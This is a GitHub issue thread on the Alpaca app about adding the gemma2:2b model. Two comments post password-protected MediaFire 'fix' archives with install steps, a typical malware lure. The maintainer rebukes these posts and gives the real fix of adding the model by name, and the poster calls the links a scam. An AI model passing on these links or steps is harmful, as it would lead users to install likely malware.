### ISSUE TITLE
support for gemma2 2b

### ISSUE THREAD

**Issue by TheRsKing** [Jeffser/Alpaca#259]
**Describe the bug**
gemma2 2b is not available for selection in the models download menu
https://ollama.com/library/gemma2:2b

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jeffser** [comment]
Please refrain from sharing files from other websites on the repository, as for gemma2 2b, you can download unlisted models by pressing the '+' button inside the model manager and then selecting 'by name' and type gemma2:2b

**Comment by TheRsKing** [comment]
> Please refrain from sharing files from other websites on the repository, as for gemma2 2b, you can download unlisted models by pressing the '+' button inside the model manager and then selecting 'by name' and type gemma2:2b

thanks a lot, already assumed it is a scam. is there a reason why it's not listed, sorry if i'm just being silly

**Comment by TheRsKing** [comment]
thank you very much <3 great app
